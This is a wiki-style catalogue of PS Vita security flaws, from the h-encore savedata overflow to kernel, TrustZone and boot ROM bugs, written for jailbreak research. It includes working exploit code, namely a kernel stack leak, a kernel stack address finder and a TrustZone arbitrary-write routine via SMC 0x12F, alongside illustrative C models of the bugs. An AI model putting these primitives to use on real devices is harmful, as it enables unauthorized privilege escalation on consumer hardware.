h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it uses a gamesave exploit. The reason for that is that after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since loading sysmodules was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if a user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is that games developed with SDK 2.60 and lower were compiled as statically linked executables, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you just fuzz gamesaves by writing random data at random locations until you get a crash (the best bet is extending strings and hoping that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug lies in the parser of the bittersmile game. The gamesave is actually a text file; the game reads it line by line and copies the lines to a list of buffers. However, it doesn't validate the length, so if we put the delimiter \n far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. However, it is in the data section; luckily for us, the content after the buffer is actually the list that contains the destinations for the other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want, which gives us an arbitrary write primitive.<br />
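<br />
Added example, not the game's parser and not h-encore code: a constructed line-by-line savedata parser in C with the missing length check, beside a version that rejects overlong lines. The slot size, slot count, the tail region standing in for the destination list that follows the buffers, the 0xAA canary pattern and the sample save text are all constructed for this demonstration.<br />
<br />
```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include <string.h>

#define LINE_SLOT 16u   /* bytes per line buffer (constructed) */
#define NSLOTS    4u    /* number of line buffers (constructed) */
#define TAIL      8u    /* bytes after the slots, standing in for the destination list */

typedef struct {
    uint8_t raw[LINE_SLOT * NSLOTS + TAIL];   /* slots followed by the tail, one object */
} savebuf_t;

/* Zero the slots and fill the tail with a canary pattern. */
static void savebuf_init(savebuf_t *s)
{
    memset(s->raw, 0, sizeof s->raw);
    memset(s->raw + LINE_SLOT * NSLOTS, 0xAA, TAIL);
}

/* Number of tail bytes that no longer hold the canary. */
static size_t savebuf_tail_clobbered(const savebuf_t *s)
{
    size_t n = 0;
    for (size_t i = 0; i < TAIL; i++)
        if (s->raw[LINE_SLOT * NSLOTS + i] != 0xAA) n++;
    return n;
}

/* Vulnerable model: copies each line up to '\n' into its slot without checking
 * that it fits. The constructed input below is sized so the overflow lands in
 * the tail (the "list" of the text) and stays inside raw[]. Returns lines stored. */
static size_t parse_vulnerable(savebuf_t *s, const char *save, size_t len)
{
    size_t slot = 0, pos = 0;
    while (pos < len && slot < NSLOTS) {
        uint8_t *dst = s->raw + slot * LINE_SLOT;
        size_t n = 0;
        while (pos < len && save[pos] != '\n')
            dst[n++] = (uint8_t)save[pos++];      /* no bound on n */
        dst[n] = 0;
        pos++; slot++;
    }
    return slot;
}

/* Hardened: a line must fit in its slot together with the NUL terminator,
 * otherwise the whole save is rejected instead of truncated silently. */
static bool parse_hardened(savebuf_t *s, const char *save, size_t len)
{
    size_t slot = 0, pos = 0;
    while (pos < len && slot < NSLOTS) {
        uint8_t *dst = s->raw + slot * LINE_SLOT;
        size_t n = 0;
        while (pos < len && save[pos] != '\n') {
            if (n + 1 >= LINE_SLOT) return false;  /* would overflow the slot */
            dst[n++] = (uint8_t)save[pos++];
        }
        dst[n] = 0;
        pos++; slot++;
    }
    return true;
}

/* Constructed save whose fourth line (20 bytes) exceeds its 16-byte slot. */
static size_t demo_vulnerable_tail_clobbered(void)
{
    static const char save[] = "a\nb\nc\nAAAAAAAAAAAAAAAAAAAA\n";
    savebuf_t s;
    savebuf_init(&s);
    parse_vulnerable(&s, save, sizeof save - 1);
    return savebuf_tail_clobbered(&s);
}

/* True when the hardened parser accepts the save and the tail is untouched. */
static bool demo_hardened_accepts(const char *save, size_t len)
{
    savebuf_t s;
    savebuf_init(&s);
    return parse_hardened(&s, save, len) && savebuf_tail_clobbered(&s) == 0;
}
```
<br />
The vulnerable parser writes the 20-byte line plus its terminator past the last slot and overwrites five bytes of the tail, which is the same mechanism the text describes for the destination list; the hardened parser stops at the fifteenth byte of that line and reports the save as invalid.<br />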
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn't sanity-check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that however much Sony secures the PSVita store, we will always be able to activate as long as the PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall id (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall id passed in R12 can index past the end of the syscall table, causing an arbitrary kernel function pointer to be dereferenced and then executed.<br />
<br />
Tested on 1.50-1.60. Patched on 1.61.<br />
<br />
=== Syscall handler leaks syscall table vaddr ===<br />
<br />
Calling svc with an invalid syscall id will end the svc interrupt without clearing syscall table vaddr in r0.<br />
<br />
Tested on 1.50. ?Patched on 1.61?<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via WebKit exploits (not fself nor games, but maybe ePSP or PSM).<br />
<br />
Call some interesting functions in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get up to 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in the range (0x80; 0x1000], it uses the SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available, instead of returning NULL it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the used functions are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least up to firmware 1.692) the voice definition address must not be XORed, otherwise sceNgsRackGetRequiredMemorySize returns SCE_NGS_ERROR_INVALID.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME value lets the scan find the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 // offset of the sceIoDevctl copy of the fake voice definition from the kernel stack base, specific to 1.692<br />
<br />
SceInt32 gRet = 0; // last return value of sceNgsRackGetRequiredMemorySize, kept for debugging<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
memset(&rackDesc, 0x00, sizeof(rackDesc));<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
// Fake voice definition: sceIoDevctl copies it onto the kernel stack, where it stays after the call returns<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, sizeof(voiceDef));<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2] = 0x40;<br />
voiceDef[3] = 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
// Scan candidate kernel stack pages: the call only gets past its parameter checks when pVoiceDefn points at the copy<br />
for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
{<br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
return (addr - DEVCTL_STACK_FRAME); // kernel stack base address<br />
}<br />
return 0xFFFFFFFF; // not found<br />
}<br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two following bugs are exploited by calling memcpy with a negative length: the out-of-bounds access goes through without a huge copy and without triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, adding it to dst wraps around and yields a value smaller than dst. The comparison later in the code is then false, whether it is signed or unsigned, so memcpy believes there are fewer than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. A negative length therefore simply bypasses the copy loop.<br />
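The behaviour described in the two bugs above, modelled in C as an added example: this is not Sony's memcpy and not code from h-encore, and the caller with the signed bounds check (<code>copy_into_table</code>) is hypothetical. It shows why a negative length is attractive: the check is passed with an offset beyond the table, and the flawed memcpy then copies nothing instead of copying gigabytes or faulting.<br />
<br />
```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/*
 * Model of a memcpy with the two flaws the write-up describes (added example,
 * not Sony's implementation): the "large copy" path is selected by comparing
 * dst + len against dst + 32, and the byte loop compares len as a signed value.
 * On the Vita len is 32-bit; size_t and ptrdiff_t wrap the same way on a 64-bit host.
 */
void *model_memcpy(void *dst, const void *src, size_t len)
{
    uint8_t *d = dst;
    const uint8_t *s = src;
    uintptr_t end = (uintptr_t)d + len;           /* bug 1: wraps below d when len is "negative" */

    if (end >= (uintptr_t)d + 32) {               /* false for negative len: large path is skipped */
        size_t words = len / 8;
        for (size_t i = 0; i < words; i++) {
            memcpy(d + i * 8, s + i * 8, 8);      /* word-wise bulk copy */
        }
        d += words * 8;
        s += words * 8;
        len -= words * 8;
    }
    for (ptrdiff_t i = 0; i < (ptrdiff_t)len; i++) { /* bug 2: signed compare, negative len copies nothing */
        d[i] = s[i];
    }
    return dst;
}

/*
 * Hypothetical caller (assumption: not code from SceNgs) with the kind of
 * signed bounds check a negative length slips past. Returns 0 when the copy
 * was accepted, -1 when rejected.
 */
int copy_into_table(uint8_t *table, size_t table_size, int offset, int len, const uint8_t *src)
{
    if (offset < 0 || offset + len > (int)table_size) {
        return -1;                                /* passes for an offset past the end when len < 0 */
    }
    model_memcpy(table + offset, src, (size_t)len);
    return 0;
}

/* Number of bytes model_memcpy actually writes for a given length (dst starts zeroed, src is 0x41). */
size_t count_copied(size_t len)
{
    uint8_t dst[64], src[64];
    memset(dst, 0, sizeof dst);
    memset(src, 0x41, sizeof src);
    model_memcpy(dst, src, len);
    size_t n = 0;
    for (size_t i = 0; i < sizeof dst; i++) {
        n += (dst[i] == 0x41);
    }
    return n;
}

/* Demonstration: a sane copy works, and a negative length past the end is accepted but writes nothing. */
int demo_negative_len(void)
{
    uint8_t backing[256];       /* the table is the first 64 bytes; the rest models neighbouring memory */
    uint8_t src[64];
    uint8_t *table = backing;
    memset(backing, 0, sizeof backing);
    memset(src, 0x41, sizeof src);

    if (copy_into_table(table, 64, 8, 40, src) != 0) return 1;
    if (table[8] != 0x41 || table[47] != 0x41 || table[48] != 0) return 2;

    /* offset 100 lies beyond the 64-byte table, yet 100 + (-80) <= 64 satisfies the check */
    if (copy_into_table(table, 64, 100, -80, src) != 0) return 3;
    /* nothing was written past the table and no fault occurred */
    if (backing[64] != 0 || backing[100] != 0) return 4;
    return 0;
}
```

<code>count_copied()</code> confirms that sane lengths still go through both the word-wise path and the byte loop as expected, so the model only misbehaves for the negative case the write-up relies on.<br />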
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution, the eMMC MBR can be modified to change the block size. At the time yifan was trying to exploit it through an adjacent malloc (controlled_size), could not find a way, and left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyz finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw in error code propagation in NSKBL: a function does not check an error return; if it did, the value corrupted by the buffer overflow would not have been used. Later on, the field that was overwritten is used in a separate call.<br />
<br />
This turns the overflow into a usable buffer overflow in the data section and yields early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A list of the 1.80 TrustZone modules' imports/exports is available: [[File:Psvita_1.80_tz_nids.txt]]<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code>, it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size 0x5000 bytes) and the Secure Kernel sees the exact same region at <code>0x00560000</code>. Data can therefore be planted in the Non-secure Kernel's view of the region and the SMC made to copy it somewhere into TrustZone memory (e.g. the SMC table), which results in TrustZone-level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
// Write 8 bytes from the Non-secure Kernel into TrustZone memory at dst using SMC 0x12F.<br />
// 0x00400000 is the NS Kernel view of the shared memory region; TrustZone sees it at 0x00560000.<br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
// Stage the data where the SMC reads it: (tz_addr + 0x28) with tz_addr = 0x00560000, i.e. offset 0x28 of the shared region<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1; // sm_handle is (tz_addr >> 1)<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80; // destination is shared_mem_base_addr + index * 0x80, so dst must be 0x80-aligned relative to the base<br />
<br />
// r0 and r1 are listed as clobbers so the compiler never allocates an input operand to them<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r0", "r1", "r12", "memory"<br />
);<br />
}<br />
</source><br />
<br />
To achieve code execution, set dst to the SMC table address and plant 2 pointers (8 = 2 * 4 bytes).<br />
<br />
Patched somewhere after 1.80 and before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The DMAC5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys by brute force, one 32-bit word at a time.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
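The partial-key-overwrite attack in C as an added example (not the DMAC5 driver and not psvimgtools code): the key slot is write-only but can be overwritten one word at a time, so each word is searched on its own against a reference ciphertext. The block function is a toy keyed mixer standing in for AES, and KEY_WORD_BITS is reduced from 32 to 8 so the search finishes instantly; the structure of the attack is unchanged, 4 × 2^32 trials for a 128-bit key instead of 2^128.<br />
<br />
```c
#include <stdint.h>
#include <stdbool.h>
#include <string.h>

/*
 * Model of a write-only key slot that can be overwritten one word at a time
 * (added example, not the DMAC5 driver). KEY_WORD_BITS is 32 on the real
 * engine; it is reduced to 8 here so the search finishes instantly. The block
 * function is a toy keyed mixer standing in for AES: the attack only needs a
 * deterministic cipher and the partial-overwrite oracle.
 */
#define KEY_WORDS     4
#define KEY_WORD_BITS 8
#define WORD_MASK     ((KEY_WORD_BITS >= 32) ? 0xFFFFFFFFu : ((1u << KEY_WORD_BITS) - 1u))

typedef struct {
    uint32_t key[KEY_WORDS];    /* secret; never readable through the interface */
} key_engine_t;

static uint64_t toy_block(const uint32_t key[KEY_WORDS], uint64_t pt)
{
    uint64_t x = pt ^ 0x9E3779B97F4A7C15ull;
    for (int r = 0; r < 8; r++) {
        x ^= (uint64_t)key[r % KEY_WORDS] * 0x100000001B3ull;
        x *= 0xC2B2AE3D27D4EB4Full;
        x ^= x >> 29;
        x += (uint64_t)r << 33;
    }
    return x;
}

/* The two operations the kernel gets: overwrite one key word, and encrypt a block. */
void engine_set_key_word(key_engine_t *e, int idx, uint32_t value)
{
    e->key[idx] = value & WORD_MASK;
}

uint64_t engine_encrypt(const key_engine_t *e, uint64_t pt)
{
    return toy_block(e->key, pt);
}

/*
 * Recover the whole key with KEY_WORDS * 2^KEY_WORD_BITS encryptions instead of
 * 2^(KEY_WORDS*KEY_WORD_BITS): take a reference ciphertext under the original
 * key, then guess each word in isolation and keep the guess whose ciphertext
 * matches. A recovered word is left in the slot, so the slot differs from the
 * original key in at most the word currently being searched.
 */
bool recover_key(key_engine_t *e, uint32_t out[KEY_WORDS], uint64_t *tries)
{
    const uint64_t pt = 0x0123456789ABCDEFull;    /* any fixed known plaintext */
    uint64_t reference = engine_encrypt(e, pt);
    *tries = 0;
    for (int w = 0; w < KEY_WORDS; w++) {
        bool found = false;
        for (uint64_t g = 0; g <= WORD_MASK; g++) {
            engine_set_key_word(e, w, (uint32_t)g);
            (*tries)++;
            if (engine_encrypt(e, pt) == reference) {
                out[w] = (uint32_t)g;
                found = true;
                break;
            }
        }
        if (!found) {
            return false;       /* the slot now holds a wrong word; the caller cannot restore it */
        }
    }
    return true;
}

/* Demonstration: plant a constructed secret key and recover it through the oracle. Returns the trial count. */
int demo_recover(void)
{
    key_engine_t e = { { 0x5A, 0xC3, 0x01, 0xF7 } };   /* constructed secret */
    uint32_t secret[KEY_WORDS];
    uint32_t recovered[KEY_WORDS];
    uint64_t tries;
    memcpy(secret, e.key, sizeof secret);
    if (!recover_key(&e, recovered, &tries)) return -1;
    if (memcmp(recovered, secret, sizeof secret) != 0) return -2;
    if (tries > (uint64_t)KEY_WORDS * ((uint64_t)WORD_MASK + 1u)) return -3;
    return (int)tries;
}
```

A wrong guess can only match the reference by a ciphertext collision for the fixed plaintext, which for a real block cipher happens with probability about 2^-128 per trial; the toy mixer has a 64-bit block, which is still far below anything the reduced search could hit.<br />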
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code>, which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory), and later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and the memory is therefore safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however, cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to reuse the buffer). Below is a summary of all the exceptions and why they cannot be triggered.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault into either the decoding or the execution unit of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table whose entries all point to our payload, we can execute F00D code at bootrom time (before the bootrom is unmapped). This is a very desirable glitching target because it requires almost no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
=== Boot ROM Enc buffer overflow ===<br />
<br />
(2019-08-30) The development boot ROM does not check [[Enc]] header correctly. Specifically, the "code size" field (at offset 0x10) is only checked after adding it to "offset to code". The calculation can overflow, for example, when <code>code_size == -offset_code</code>. Further, when loading an Enc binary from ARM, the size to copy in is calculated with <code>(scratch->code_size + scratch->offset_code) - 0x40</code>. Now that the sum of code_size and offset_code is 0, this calculation would underflow to -0x40, or 0xffffffc0, resulting in a huge amount of data being copied in and overwriting parts of the boot ROM.<br />
